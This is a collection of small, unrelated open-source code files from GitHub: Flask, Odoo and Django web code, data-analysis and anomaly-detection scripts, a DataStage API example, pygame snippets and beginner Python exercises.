)\n\n\n","repo_name":"edgi-govdata-archiving/EEW-Report-Making","sub_path":"reportcards/make_sedfiles.py","file_name":"make_sedfiles.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42800790583","text":"import os\nfrom myproject import app,db\nfrom flask import render_template, redirect, request, url_for, flash, abort, send_file\nfrom flask_login import login_user,login_required,logout_user\nfrom myproject.models import User\nfrom myproject.forms import LoginForm, RegistrationForm\nfrom myproject.reporting import create_VAT_Report\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n@app.route('/welcome')\n@login_required\ndef welcome_user():\n return render_template('welcome_user.html')\n\n@app.route('/reports', methods=['GET', 'POST'])\n@login_required\ndef reports():\n if request.method == 'POST':\n sales_report = request.files['file']\n if sales_report.filename != '':\n filename = sales_report.filename\n xls_filename = filename[:-3]+\"xls\"\n sales_report.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n csv_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n xls_path = os.path.join(app.config['REPORTS_FOLDER'], xls_filename)\n create_VAT_Report(csv_path,xls_path)\n '''\n Delete from UPLOAD FOLDER\n Delete from REPORTS FOLDER\n '''\n return send_file(f'../reports/{xls_filename}',mimetype='xls',attachment_filename=f'{xls_filename}',as_attachment=True)\n return render_template('reports.html')\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n flash('You logged out!')\n return redirect(url_for('home'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\n form = LoginForm()\n if form.validate_on_submit():\n # Grab the user from our User Models table\n user = User.query.filter_by(email=form.email.data).first()\n\n # Check that the user was supplied and the password is right\n # The verify_password method comes from the User object\n # https://stackoverflow.com/questions/2209755/python-operation-vs-is-not\n\n if user.check_password(form.password.data) and user is not None:\n #Log in the user\n\n login_user(user)\n flash('Logged in successfully.')\n\n # If a user was trying to visit a page that requires a login\n # flask saves that URL as 'next'.\n next = request.args.get('next')\n\n # So let's now check if that next exists, otherwise we'll go to\n # the welcome page.\n if next == None or not next[0]=='/':\n next = url_for('welcome_user')\n\n return redirect(next)\n return render_template('login.html', form=form)\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm()\n\n if form.validate_on_submit():\n user = User(email=form.email.data,\n username=form.username.data,\n password=form.password.data)\n\n db.session.add(user)\n db.session.commit()\n flash('Thanks for registering! Now you can login!')\n return redirect(url_for('login'))\n return render_template('register.html', form=form)\n #return redirect(url_for('login'))\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"onmyeoin/WebApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35887692337","text":"from bokeh.charts import Bar, Area\nfrom bokeh.embed import file_html\nfrom bokeh.resources import INLINE\nfrom bokeh.charts.attributes import cat\nfrom positions import portfolio_utils as pu\n\n\ndef get_position_data(positions):\n \"\"\"Fetches metrics for given Position objects to be used for analysis views\"\"\"\n\n # columns to return\n cols = [\"Name\", \"Symbol\", \"Shares\", \"Market Value ($)\", \"Last Price ($)\", \"Day's Change ($)\", \"Day's Change (%)\",\n \"Day's Gain/Loss ($)\", \"Cost Basis ($)\", \"Total Gain/Loss ($)\", \"Overall Return (%)\", \"Account\"]\n\n df = pu.get_positions_dataframe(positions, nthreads=10)\n\n # derived values\n df[\"Market Value ($)\"] = df[\"Shares\"] * df[\"Last Price ($)\"]\n df[\"Day's Gain/Loss ($)\"] = df[\"Shares\"] * df[\"Day's Change ($)\"]\n df[\"Total Gain/Loss ($)\"] = df[\"Market Value ($)\"] - df[\"Cost Basis ($)\"]\n df[\"Overall Return (%)\"] = 100. * df[\"Total Gain/Loss ($)\"] / df[\"Cost Basis ($)\"]\n df[\"Concentration\"] = 100. * df[\"Market Value ($)\"] / df[\"Market Value ($)\"].sum()\n\n return df\n\n\ndef get_concentration_bar_chart(df):\n \"\"\"Creates bar chart visualizing portfolio concentration by position\"\"\"\n df = df[[\"Symbol\", \"Concentration\"]].sort_values(\"Concentration\", ascending=False)\n\n chart = Bar(\n df,\n label=cat(columns='Symbol', sort=False),\n values='Concentration',\n title='Portfolio Concentration By Position',\n ylabel='Concentration (%)',\n plot_width=1200,\n plot_height=400,\n legend=False,\n color='#4285f4'\n )\n\n return file_html(chart, INLINE)\n\n\ndef get_concentration_area_chart(df):\n \"\"\"Creates area chart visualizing portfolio concentration by position\"\"\"\n df = (\n df[[\"Symbol\", \"Concentration\"]]\n .sort_values(\"Concentration\")\n .set_index(\"Symbol\")\n .cumsum()\n .reset_index()\n .drop(\"Symbol\", axis=1)\n )\n\n chart = Area(\n df['Concentration'].astype(float),\n title='Cumulative Portfolio Concentration',\n ylabel='% of Total Value',\n xlabel='Number of Positions',\n plot_width=1200,\n plot_height=400,\n legend=False,\n color='#4285f4'\n )\n\n chart.x_range.start, chart.x_range.end = 0, df.shape[0]\n\n return file_html(chart, INLINE)\n","repo_name":"rdcolema/snapshot-finance","sub_path":"analysis/analysis_utils.py","file_name":"analysis_utils.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"12505927194","text":"# palindrome function definition goes here\ndef checkpalindrome(in_str):\n #string = \"\".join(e for e in in_str if e.isalnum())\n #org = \"\".join(e for e in in_str if e.isalnum())\n string = \"\"\n for x in in_str:\n if x.isalnum():\n string += x\n revstring = string[::-1]\n if revstring.lower() == string.lower():\n return True\n return False\nin_str = input(\"Enter a string: \")\n\ncheck = checkpalindrome(in_str)\n# call the function and print out the appropriate message\n\nif check:\n print(f\"\\\"{in_str}\\\" is a palindrome.\")\nelse:\n print(f\"\\\"{in_str}\\\" is not a palindrome.\")\n","repo_name":"Illugi317/forritun","sub_path":"Unsorted/digit.py","file_name":"digit.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2618587534","text":"import torch\nimport torch.nn.functional as F\nfrom data_loader import MVTecDRAEMTestDataset\nfrom torch.utils.data import DataLoader\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score, average_precision_score\nfrom model_unet import ReconstructiveSubNetwork, DiscriminativeSubNetwork\nfrom tensorboard_visualizer import TensorboardVisualizer\nfrom tensorboard_visualizer import TensorboardVisualizer\nimport os\n\n\ndef write_results_to_file(run_name, image_auc, pixel_auc, image_ap, pixel_ap):\n if not os.path.exists('./outputs/'):\n os.makedirs('./outputs/')\n\n fin_str = \"img_auc\"\n for i in image_auc:\n fin_str += \",\" + str(np.round(i, 3))\n fin_str += \",\"+str(np.round(np.mean(image_auc), 3))\n fin_str += \"\\n\"\n fin_str += \"pixel_auc\"\n for i in pixel_auc:\n fin_str += \",\" + str(np.round(i, 3))\n fin_str += \",\"+str(np.round(np.mean(pixel_auc), 3))\n fin_str += \"\\n\"\n fin_str += \"img_ap\"\n for i in image_ap:\n fin_str += \",\" + str(np.round(i, 3))\n fin_str += \",\"+str(np.round(np.mean(image_ap), 3))\n fin_str += \"\\n\"\n fin_str += \"pixel_ap\"\n for i in pixel_ap:\n fin_str += \",\" + str(np.round(i, 3))\n fin_str += \",\"+str(np.round(np.mean(pixel_ap), 3))\n fin_str += \"\\n\"\n fin_str += run_name\n fin_str += \"\\n\"\n fin_str += \"--------------------------\\n\"\n\n\n with open(\"./outputs/results.txt\",'a+') as file:\n file.write(fin_str)\n\n\ndef test(obj_names, args, epoch, test_dataset=None):\n obj_ap_pixel_list = []\n obj_auroc_pixel_list = []\n obj_ap_image_list = []\n obj_auroc_image_list = []\n for obj_name in obj_names:\n img_dim = 256\n run_name = args.base_model_name + obj_name+'_'\n if args.visualize:\n visualizer = TensorboardVisualizer(log_dir=os.path.join(args.log_path, run_name + \"/\"))\n\n model = ReconstructiveSubNetwork(in_channels=3, out_channels=3)\n old_ckpt = torch.load(os.path.join(args.checkpoint_path, run_name + \".pckl\"), 'cpu')\n new_ckpt = {}\n for k, v in old_ckpt.items():\n new_k = k.replace('module.', '')\n new_ckpt[new_k] = v\n model.load_state_dict(new_ckpt)\n model.cuda()\n model.eval()\n\n model_seg = DiscriminativeSubNetwork(in_channels=6, out_channels=2)\n old_ckpt = torch.load(os.path.join(args.checkpoint_path, run_name + \"_seg.pckl\"), 'cpu')\n new_ckpt = {}\n for k, v in old_ckpt.items():\n new_k = k.replace('module.', '')\n new_ckpt[new_k] = v\n model_seg.load_state_dict(new_ckpt)\n model_seg.cuda()\n model_seg.eval()\n\n\n root_dir = args.data_path\n if args.dataset == 'mvtec':\n root_dir += obj_name\n\n if test_dataset is None:\n test_dataset = MVTecDRAEMTestDataset(args.dataset, root_dir, resize_shape=[img_dim, img_dim])\n\n test_loader = DataLoader(test_dataset, batch_size=1, shuffle=False, num_workers=0)\n\n total_pixel_scores = np.zeros((img_dim * img_dim * len(test_dataset)))\n total_gt_pixel_scores = np.zeros((img_dim * img_dim * len(test_dataset)))\n mask_cnt = 0\n\n anomaly_score_gt = []\n anomaly_score_prediction = []\n\n display_images = torch.zeros((16 ,3 ,256 ,256)).cuda()\n display_gt_images = torch.zeros((16 ,3 ,256 ,256)).cuda()\n display_out_masks = torch.zeros((16 ,1 ,256 ,256)).cuda()\n display_in_masks = torch.zeros((16 ,1 ,256 ,256)).cuda()\n cnt_display = 0\n display_indices = np.random.randint(len(test_loader), size=(16,))\n\n with torch.no_grad():\n for i_batch, sample_batched in enumerate(test_loader):\n\n gray_batch = sample_batched[\"image\"].cuda()\n\n is_normal = sample_batched[\"has_anomaly\"].detach().numpy()[0, 0] #bs=1\n anomaly_score_gt.append(is_normal)\n true_mask = sample_batched[\"mask\"]\n true_mask_cv = true_mask.detach().numpy()[0, :, :, :].transpose((1, 2, 0)) # (256,256,1)\n\n gray_rec = model(gray_batch)\n joined_in = torch.cat((gray_rec.detach(), gray_batch), dim=1)\n\n out_mask = model_seg(joined_in)\n out_mask_sm = torch.softmax(out_mask, dim=1) # (1,2,256,256)\n # 通道0(像素0)代表正常,通道1(像素1)代表异常,softmax 0 1分类后,和gt的one-hot标签对比\n\n out_mask_cv = out_mask_sm[0 ,1 ,: ,:].detach().cpu().numpy() # (256,256)\n # 对mask做了一次平滑\n out_mask_averaged = torch.nn.functional.avg_pool2d(out_mask_sm[: ,1: ,: ,:], 21, stride=1,\n padding=21 // 2).cpu().detach().numpy()\n # print(\"test\")\n # print(\"true_mask_cv:\", true_mask_cv.shape)\n # print(\"out_mask:\", out_mask.size())\n # print(\"out_mask_sm:\", out_mask_sm.size())\n # print(\"out_mask_cv:\", out_mask_cv.shape)\n\n if i_batch in display_indices:\n t_mask = out_mask_sm[:, 1:, :, :]\n display_images[cnt_display] = gray_rec[0]\n display_gt_images[cnt_display] = gray_batch[0]\n display_out_masks[cnt_display] = t_mask[0]\n display_in_masks[cnt_display] = true_mask[0]\n cnt_display += 1\n\n\n image_score = np.max(out_mask_averaged)\n\n anomaly_score_prediction.append(image_score)\n\n flat_true_mask = true_mask_cv.flatten()\n flat_out_mask = out_mask_cv.flatten()\n total_pixel_scores[mask_cnt * img_dim * img_dim:(mask_cnt + 1) * img_dim * img_dim] = flat_out_mask\n total_gt_pixel_scores[mask_cnt * img_dim * img_dim:(mask_cnt + 1) * img_dim * img_dim] = flat_true_mask\n mask_cnt += 1\n\n if args.visualize:\n visualizer.visualize_image_batch(display_images, epoch, image_name='test_rec')\n visualizer.visualize_image_batch(display_gt_images, epoch, image_name='test_img')\n visualizer.visualize_image_batch(display_out_masks, epoch, image_name='test_out_mask')\n visualizer.visualize_image_batch(display_in_masks, epoch, image_name='test_gt_mask')\n\n anomaly_score_prediction = np.array(anomaly_score_prediction)\n anomaly_score_gt = np.array(anomaly_score_gt)\n auroc = roc_auc_score(anomaly_score_gt, anomaly_score_prediction)\n ap = average_precision_score(anomaly_score_gt, anomaly_score_prediction)\n\n total_gt_pixel_scores = total_gt_pixel_scores.astype(np.uint8)\n total_gt_pixel_scores = total_gt_pixel_scores[:img_dim * img_dim * mask_cnt]\n total_pixel_scores = total_pixel_scores[:img_dim * img_dim * mask_cnt]\n auroc_pixel = roc_auc_score(total_gt_pixel_scores, total_pixel_scores)\n ap_pixel = average_precision_score(total_gt_pixel_scores, total_pixel_scores)\n obj_ap_pixel_list.append(ap_pixel)\n obj_auroc_pixel_list.append(auroc_pixel)\n obj_auroc_image_list.append(auroc)\n obj_ap_image_list.append(ap)\n print(obj_name)\n print(\"AUC Image: \" +str(auroc))\n print(\"AUC Pixel: \" +str(auroc_pixel))\n print(\"AP Image: \" +str(ap))\n print(\"AP Pixel: \" +str(ap_pixel))\n print(\"==============================\")\n\n # if args.dataset == 'mt' or 'aitex':\n log_path = \"./outputs/\" + str(args.dataset) + \"/\" + str(obj_name) + \"_result.log\"\n log = \"AUC Image: \" + str(auroc) + '\\n' + \"AUC Pixel: \" + str(auroc_pixel) + '\\n' + \\\n \"AP Image: \" + str(ap) + '\\n' + \"AP Pixel: \" + str(ap_pixel) + '\\n' + \"==============================\" + '\\n' + run_name\n with open(log_path, 'a+') as file:\n file.write(log + '\\n')\n return [auroc, auroc_pixel, ap, ap_pixel]\n\n\n # print(\"AUC Image mean: \" + str(np.mean(obj_auroc_image_list)))\n # print(\"AP Image mean: \" + str(np.mean(obj_ap_image_list)))\n # print(\"AUC Pixel mean: \" + str(np.mean(obj_auroc_pixel_list)))\n # print(\"AP Pixel mean: \" + str(np.mean(obj_ap_pixel_list)))\n # write_results_to_file(run_name, obj_auroc_image_list, obj_auroc_pixel_list, obj_ap_image_list, obj_ap_pixel_list)\n\n\n\n\n\nif __name__==\"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu_id', action='store', type=int, required=True)\n parser.add_argument('--base_model_name', action='store', type=str, required=True)\n parser.add_argument('--data_path', action='store', type=str, required=True)\n parser.add_argument('--checkpoint_path', action='store', type=str, required=True)\n parser.add_argument('--dataset', action='store', type=str, required=True)\n parser.add_argument('--visualize', action='store_true', required=False)\n parser.add_argument('--log_path', action='store', type=str, required=True)\n args = parser.parse_args()\n\n\n args = parser.parse_args()\n if args.dataset == 'mvtec':\n obj_list = ['capsule',\n 'bottle',\n 'carpet',\n 'leather',\n 'pill',\n 'transistor',\n 'tile',\n 'cable',\n 'zipper',\n 'toothbrush',\n 'metal_nut',\n 'hazelnut',\n 'screw',\n 'grid',\n 'wood'\n ]\n elif args.dataset == 'mt':\n obj_list = ['mt']\n elif args.dataset == 'aitex':\n obj_list = ['aitex']\n\n\n with torch.cuda.device(args.gpu_id):\n test(obj_list, args)\n # test(obj_list, args.dataset, args.data_path, args.checkpoint_path, args.base_model_name, args.visualize, args.log_path)\n","repo_name":"YanZhenyu1999/SAD","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":9883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4783903038","text":"from django.contrib import admin\nfrom import_export import resources, fields\nfrom assocr.models import Member, UF\n\nclass MemberResource(resources.ModelResource): \n #name = fields.Field(column_name='Nom')\n #firstsurname = fields.Field(column_name='1r Cogonom')\n \n class Meta:\n model = Member\n fields = ('uf__association__penyanumber', 'uf__currentaccount', 'uf__typequote', 'id', 'uf', 'name', 'firstsurname','secondsurname','dni',\n 'birthdaydate', 'typeadress', 'adress', 'number', 'portal', 'ladder', 'floor', 'door','postalcode', 'city', 'province', 'country', 'telephone', 'fcbmember', 'fcbnumber', 'email', )\n export_order = ('uf__association__penyanumber', 'uf__currentaccount', 'uf__typequote', 'id', 'uf', 'name', 'firstsurname','secondsurname','dni',\n 'birthdaydate', 'typeadress', 'adress', 'number', 'portal', 'ladder', 'floor', 'door','postalcode', 'city', 'province', 'country', 'telephone', 'fcbmember', 'fcbnumber', 'email', ) \n \n def before_import(self, dataset, dry_run): \n if 'uf' in dataset.headers:\n for row in dataset.dict:\n try:\n unif = UF.objects.get(id=int(row['uf']))\n unif.currentaccount = row['uf__currentaccount']\n unif.typequote = row['uf__typequote']\n unif.save()\n except UF.DoesNotExist:\n unif = None\n unif = UF(id=int(row['uf']))\n assoc = Association.objects.get(penyanumber=int(row['uf__association__penyanumber']))\n unif.association = assoc\n unif.state = 1\n unif.currentaccount = row['uf__currentaccount']\n unif.typequote = row['uf__typequote']\n unif.save()\n\n","repo_name":"erueloi/Assocr","sub_path":"assocr/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19564761636","text":"# coding: utf-8\nimport os, math\n\npeso = int(raw_input(\"Quantidade de Quilos pescada : \"))\n\nexcedente = 'ZERO'\nmulta = 'ZERO'\n\nif peso > 50:\n excedente = peso - 50.00\n multa = excedente * 4.00\n\nprint ('Peso Excedente %s Kg(s)' % str(excedente))\nprint ('Valor da Multa R$ %s ' % str(multa))\n","repo_name":"andersonlemos/PythonForZombies","sub_path":"Task List/exercise5.py","file_name":"exercise5.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"570711995","text":"from config import *\nfrom ibm_datastage_api import DSAPI, convert_char_p_to_list\n\ndsapi = DSAPI()\nhproj = None\nhjob = None\n\ntry:\n _, err = dsapi.DSLoadLibrary(API_LIB_FILE)\n if err:\n raise Exception(\"Loading the library failed: {}\".format(err))\n\n print(\"Setting the parameters to connect to DataStage server\")\n dsapi.DSSetServerParams(DS_DOMAIN_NAME, DS_USER_NAME, DS_PASSWORD, DS_SERVER)\n\n print(\"Loading the project {}\".format(DS_PROJECT))\n hproj, err = dsapi.DSOpenProject(DS_PROJECT)\n if err:\n raise Exception(\"Can't open the project {}: {}\".format(DS_PROJECT, err))\n\n print(\"Loading the job {}\".format(DS_JOB_NAME))\n hjob, err = dsapi.DSOpenJob(hproj, DS_JOB_NAME)\n if err:\n raise Exception(\"Can't open the job {}: {}\".format(DS_JOB_NAME, err))\n\n print(\"Getting an information about the link of the stage\")\n\n DS_JOB_STAGE_NAME = 'TR_TST'\n DS_JOB_STAGE_LINK_NAME = 'LNK_TR'\n\n infoTypes_list = [\n (dsapi.DSJ_LINKLASTERR, 'DSJ_LINKLASTERR'),\n (dsapi.DSJ_LINKNAME, 'DSJ_LINKNAME'),\n (dsapi.DSJ_LINKROWCOUNT, 'DSJ_LINKROWCOUNT'),\n (dsapi.DSJ_LINKSQLSTATE, 'DSJ_LINKSQLSTATE'),\n (dsapi.DSJ_LINKDBMSCODE, 'DSJ_LINKDBMSCODE'),\n (dsapi.DSJ_LINKDESC, 'DSJ_LINKDESC'),\n (dsapi.DSJ_LINKSTAGE, 'DSJ_LINKSTAGE'),\n (dsapi.DSJ_INSTROWCOUNT, 'DSJ_INSTROWCOUNT'),\n (dsapi.DSJ_LINKEXTROWCOUNT, 'DSJ_LINKEXTROWCOUNT')\n ]\n\n for infoType, infoName in infoTypes_list:\n res, err = dsapi.DSGetLinkInfo(hjob, DS_JOB_STAGE_NAME, DS_JOB_STAGE_LINK_NAME, infoType)\n if err:\n print(\"{}. Can't get the link info: {}\".format(infoName, err))\n else:\n if infoName == 'DSJ_LINKLASTERR':\n print(\"{} = {}\".format(infoName, convert_char_p_to_list(res.fullMessage)))\n else:\n print(\"{} = {}\".format(infoName, res))\n\n print(\"Closing the job\")\n dsapi.DSCloseJob(hjob)\n hjob = None\n\n print(\"Closing the project\")\n dsapi.DSCloseProject(hproj)\n hproj = None\n\n dsapi.DSUnloadLibrary()\n\nexcept Exception as e:\n print(\"Runtime error: {}\".format(str(e)))\n\n if hjob:\n print(\"Unblocking the job\")\n dsapi.DSUnlockJob(hjob)\n\n print(\"Closing the job\")\n dsapi.DSCloseJob(hjob)\n hjob = None\n\n if hproj:\n print(\"Closing the project\")\n dsapi.DSCloseProject(hproj)\n hproj = None\n\n dsapi.DSUnloadLibrary()\n\nprint(\"Exit.\")\n","repo_name":"reijnnn/IBM-DataStage-API","sub_path":"Examples/17_get_link_info.py","file_name":"17_get_link_info.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"36838577750","text":"import pygame\nfrom os import path\n\n\ndef create_pictures(img_dir):\n player_img = pygame.image.load(path.join(img_dir, \"Down_0.png\")).convert()\n player_img = pygame.transform.scale(player_img, (35, 43))\n main_menu_pict = pygame.image.load(path.join(img_dir, \"menu1.png\")).convert()\n main_menu_pict = pygame.transform.scale(main_menu_pict, (860, 860))\n death_screen = pygame.image.load(path.join(img_dir, \"death_screen.jfif\")).convert()\n death_screen = pygame.transform.scale(death_screen, (860, 860))\n\n # Создание массивов с анимациями\n skelet_anim_up = ['Up 0.png', 'Up 1.png', 'Up 0.png', 'Up 2.png']\n skelet_anim_down = ['Down 0.png', 'Down 1.png', 'Down 0.png', 'Down 2.png']\n skelet_anim_left = ['Left 0.png', 'Left 1.png', 'Left 0.png', 'Left 2.png']\n skelet_anim_right = ['Right 0.png', 'Right 1.png', 'Right 0.png', 'Right 2.png']\n\n player_anim_up = ['Up_0.png', 'Up_1.png', 'Up_0.png', 'Up_2.png']\n player_anim_down = ['Down_0.png', 'Down_1.png', 'Down_0.png', 'Down_2.png']\n player_anim_left = ['Left_0.png', 'Left_1.png', 'Left_0.png', 'Left_2.png']\n player_anim_right = ['Right_0.png', 'Right_1.png', 'Right_0.png', 'Right_2.png']\n\n player_udar_up = pygame.image.load(path.join(img_dir, \"Udar_Up.png\")).convert()\n player_udar_down = pygame.image.load(path.join(img_dir, \"Udar_Down.png\")).convert()\n player_udar_left = pygame.image.load(path.join(img_dir, \"Udar_Left.png\")).convert()\n player_udar_right = pygame.image.load(path.join(img_dir, \"Udar_Right.png\")).convert()\n player_udar_up = pygame.transform.scale(player_udar_up, (30, 75))\n player_udar_down = pygame.transform.scale(player_udar_down, (30, 75))\n player_udar_left = pygame.transform.scale(player_udar_left, (75, 46))\n player_udar_right = pygame.transform.scale(player_udar_right, (75, 46))\n return (\n player_img, main_menu_pict, skelet_anim_up, skelet_anim_down, skelet_anim_left, skelet_anim_right,\n player_anim_up,\n player_anim_down, player_anim_left, player_anim_right, player_udar_up, player_udar_down, player_udar_left,\n player_udar_right, death_screen)\n","repo_name":"DronShock/Semester_Project","sub_path":"images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4949819547","text":"# Create PyGame screen and set title\n\nimport pygame\n\n# initilize the game\npygame.init()\n\n# Create the screen\nscreen = pygame.display.set_mode((800,600))\n\n# Set title\npygame.display.set_caption('Hangman')\n\n# Game loop\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n","repo_name":"SunManGH/PyGame02-Hangman","sub_path":"game0.1.py","file_name":"game0.1.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39801771456","text":"import inspect\nfrom dataclasses import dataclass, field\nfrom enum import Enum\nfrom typing import TypeVar, Type, Callable, Dict, Any, List, Tuple\n\nfrom py_object_mapper import inspection\n\n_FT = TypeVar('_FT')\n_TT = TypeVar('_TT')\n\n\n@dataclass\nclass Mapper:\n\n NONE_TYPE: Type[_TT] = type(None)\n primitive_types = [int, str, bool]\n mappings: Dict[Type[_FT], Tuple[Type[_TT], Dict[str, Callable]]] = field(default_factory=dict)\n\n def add_map(self, from_type: Type[_FT], to_type: Type[_TT], custom_mapping: Dict[str, Callable]):\n if custom_mapping is None:\n custom_mapping = {}\n self.mappings[from_type] = (to_type, custom_mapping)\n\n def map(self, from_obj: _FT, to_type: Type[_TT]) -> _TT:\n if to_type is self.NONE_TYPE:\n if type(from_obj) not in self.mappings:\n return None\n to_type = self.mappings[type(from_obj)][0]\n\n return to_type(**(\n self.__copy_params_form(from_obj, inspection.mandatory_params(to_type)) |\n self.__copy_params_form(from_obj, inspection.optional_params(to_type))\n ))\n\n def __copy_params_form(\n self,\n from_obj: _FT,\n param_infos: List[Tuple[str, inspect.Parameter]]) -> Dict[str, Any]:\n result = {}\n custom_mapping = self.mappings[type(from_obj)][1]\n from_prop = vars(from_obj)\n for param_info in param_infos:\n prop, parameter = param_info\n value_of_from = from_prop.get(prop)\n\n if prop in custom_mapping:\n value_of_from = custom_mapping[prop](from_obj)\n elif isinstance(parameter.annotation, type(Enum)):\n value_of_from = getattr(parameter.annotation, value_of_from.upper())\n elif value_of_from is None:\n value_of_from = parameter.default\n elif type(value_of_from) not in self.primitive_types:\n if isinstance(value_of_from, list):\n value_of_from = self.__mapper_list(value_of_from)\n elif isinstance(value_of_from, dict):\n value_of_from = self.__mapper_dict(value_of_from) or value_of_from\n else:\n value_of_from = self.map(value_of_from, self.NONE_TYPE)\n result[prop] = value_of_from\n return result\n\n def __mapper_dict(self, value_of_from) -> Dict[str, _TT]:\n result: Dict[str, _TT] = {}\n for key, val in value_of_from.items():\n if type(val) in self.mappings:\n to_model = self.map(val, self.NONE_TYPE)\n result[key] = to_model\n return result\n\n def __mapper_list(self, value_of_from) -> List[_TT]:\n result: List[_TT] = []\n for item in value_of_from:\n if type(item) in self.primitive_types:\n result.append(item)\n else:\n result.append(self.map(item, self.NONE_TYPE))\n return result\n\n\nmapper = Mapper()\n\n\ndef map_obj(from_obj: _FT, to_type: Type[_TT]) -> _TT:\n return mapper.map(from_obj, to_type)\n\n\ndef register_map(from_type: Type[_FT], to_type: Type[_TT], custom_mapping: Dict[str, Callable[[_FT], Any]] = None):\n return mapper.add_map(from_type, to_type, custom_mapping)\n","repo_name":"weijiany/py-object-mapper","sub_path":"py_object_mapper/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10704028007","text":"from odoo import http\nfrom odoo.addons.portal.controllers.portal import CustomerPortal, pager\n\n\nclass MyShopController(CustomerPortal):\n\n def _prepare_home_portal_values(self, counters):\n counts = super(MyShopController, self)._prepare_home_portal_values(counters)\n counts['item_counts'] = http.request.env['sulpak.smartphone'].search_count([])\n return counts\n\n @http.route(['/sulpak/smartphones', '/sulpak/smartphones/page/'], type='http', website=True, auth='public')\n def shop_items_list_view(self, page=1, **kwargs):\n item_obj = http.request.env['sulpak.smartphone']\n items_total = item_obj.search_count([])\n page_detail = pager(url='/sulpak/smartphones',\n total=items_total,\n page=page,\n step=5)\n items = item_obj.search([], limit=5, offset=page_detail['offset'])\n context = {'items': items,\n 'page_name': 'items_list',\n 'pager': page_detail}\n return http.request.render('om_sulpak.shop_items_list', context)\n","repo_name":"Geroigazy/odoo","sub_path":"custom_addons/om_sulpak/controllers/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10144914327","text":"#1 - Variables\r\nnombre = \"juan\"\r\nprint(nombre)\r\n\r\nnombre = \"laura\"\r\nprint (nombre)\r\n\r\n#2 - suma de variables\r\nedad = 10\r\nedad2 = 15\r\nprint(edad + edad2)\r\n\r\n#3 - Pedir Caracter\r\nnombre = input(\"dime tu nombre: \")\r\nprint(\"tu nombre es: \" + nombre)\r\n\r\n#4 - Concatenar variables\r\nnombre = \"hola \"\r\nnombre2 = \"phyton\"\r\nfrase = nombre + nombre2\r\nprint(frase)","repo_name":"SantiagoUGC07/Curso_Python","sub_path":"PRACT_2/2_Variables.py","file_name":"2_Variables.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36819166770","text":"import unittest\nfrom tests.base_test import BaseTest\nfrom pages.home_page import HomePage\nfrom pages.results_page import ResultsPage\n# import random\nfrom ddt import ddt, data, unpack\nimport csv\n\n\ndef get_data(file_name):\n open('/home/tester/PycharmProjects/BotlandProjectPOP/tests/products.csv')\n slowa = []\n data_file = open(file_name, 'rt')\n reader = csv.reader(data_file)\n next(reader, 1)\n for row in reader:\n slowa.append(row)\n print(row)\n return slowa\n\n@ddt\nclass ResultsTests(BaseTest):\n @data(*get_data(\"/home/tester/PycharmProjects/BotlandProjectPOP/tests/products.csv\"))\n @unpack\n def testProductSearch(self, products):\n hp = HomePage(self.driver)\n rp = ResultsPage(self.driver)\n rp.search_product(products)\n\n #test z elementem losowości: losuje 1 wartość z listy poniżej i wyszukuje w sklepie:\n # rp.search_product(\n # (random.choice([\"Drony\", \"Java Script\", \"Java\", \"Roboty\", \"Raspberry\"])))\n\n rp.search_product2()\n rp.search_product_results()\n rp.submit_results()\n rp.product_sorting()\n rp.choose_products()\n rp.close_cookies()\n rp.order_click()\n rp.verify_site_order()\n\n rp.sum_of_products()\n suma = rp.sum_of_products()\n zam2 = rp.client_order()\n self.assertEqual(suma, zam2, \"Ceny nie są zgodne.\")\n rp.clear_basket()\n\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"OneHandedTester/New_project_CDV","sub_path":"tests/results_page_test.py","file_name":"results_page_test.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72655842753","text":"import re\nfrom collections import OrderedDict\n\nfrom django import VERSION 